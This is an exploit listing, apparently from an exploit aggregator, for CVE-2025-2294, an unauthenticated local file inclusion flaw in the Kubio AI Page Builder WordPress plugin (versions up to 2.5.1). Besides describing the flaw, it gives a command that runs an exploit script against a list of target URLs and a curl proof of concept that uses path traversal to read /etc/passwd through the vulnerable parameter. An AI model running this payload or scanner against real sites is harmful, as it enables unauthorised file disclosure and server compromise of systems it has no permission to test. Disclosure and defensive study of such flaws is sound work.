Share
## https://sploitus.com/exploit?id=AA736359-13D6-55ED-A93F-614414FF50B6
# CVE-2025-2294

# ๐Ÿšจ CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress ๐Ÿงฑ

## ๐Ÿ” Overview

**CVE-2025-2294** is a critical ๐Ÿ”ฅ Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows **unauthenticated remote attackers** ๐Ÿ‘พ to include arbitrary files on the server via the `__kubio-site-edit-iframe-classic-template` URL parameter.

Exploiting this vulnerability may lead to disclosure of sensitive files ๐Ÿ“‚, remote code execution ๐Ÿ’ฅ, and full system compromise ๐Ÿ’€.

## ๐Ÿ‘ค Author

**Muhammad Nizar** โ€” Security Researcher ๐Ÿ”  
GitHub: [0xWhoami35](https://github.com/0xWhoami35)    
YouTube: [InfoSec Insight](https://www.youtube.com/channel/UC33gQFGBqkqDE0zZNwamCgw) โ–ถ๏ธ

---

*Feel free to reach out for questions or collaboration! ๐Ÿค*

---

## ๐Ÿ“‹ Affected Versions

- Kubio AI Page Builder plugin โ‰ค 2.5.1 ๐Ÿ› ๏ธ

---

## ๐Ÿงฐ Usage

Run the exploit script with a list of target URLs:

```bash
python3 lfi.py -l list.txt
```

## โš ๏ธ Vulnerability Details

- **Type:** Local File Inclusion (LFI) ๐Ÿ•ณ๏ธ  
- **Severity:** Critical (CVSS 9.8) ๐Ÿ”ฅ  
- **Attack Vector:** Remote, unauthenticated ๐ŸŒ  
- **Impact:** Confidentiality, Integrity, Availability ๐Ÿ”  

---

## ๐Ÿงช Proof of Concept (PoC)

```bash
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"